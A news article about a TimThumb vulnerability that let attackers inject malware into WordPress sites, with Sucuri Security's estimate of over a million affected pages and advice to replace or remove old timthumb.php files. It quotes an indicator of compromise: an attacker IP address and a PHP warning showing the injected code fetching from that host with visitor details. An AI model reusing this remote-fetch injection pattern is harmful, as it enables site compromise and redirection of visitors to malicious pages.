A vulnerability in the TimThumb resizer, allowed hackers to exploit it and cause a spike of malware infecting a huge number of WordPress websites that use that tool to access images from Flickr and Photobucket. Many vulnerable users were redirected to malicious sites.
The impact is not easy to estimate but analysts are doing their best to provide an answer to that question. Sucuri Security, website integrity monitoring vendor, suggested that with the help of Google he managed to estimate roughly the huge number of webpages affected.
The attack adds the output of this function to the compromised site. Such an indication looks like 91.196.216.30/bt.php. If the site has display_errors enabled on PHP, this will show up: ‘Warning: file_get_contents(http://91.196.216.30/bt.php?ip=IP&host=..’.
Using the error code to find the infected pages in Google search page, David Dede from Sucuri Security found more than 1 million results, over 200,000 of the pages were infected in the last month. David Dede method focused on one particularity of the malicious code, but the variations could be numerous and actually there could be a couple of millions webpages compromised.
Sucuri Security points out that webmasters should take immediate action to get rid of the problem. That means the timthumb.php file from the WordPress themes or plugins should be replaced with the latest version, which is safe. Old thimbthumb versions, even if they lay inactive as unused or forgotten themes, are also dangerous and should be removed. In fact, analysts suggest webmasters to remove all unused scripts or test accounts from their websites since a similar vulnerability can be found at any time.
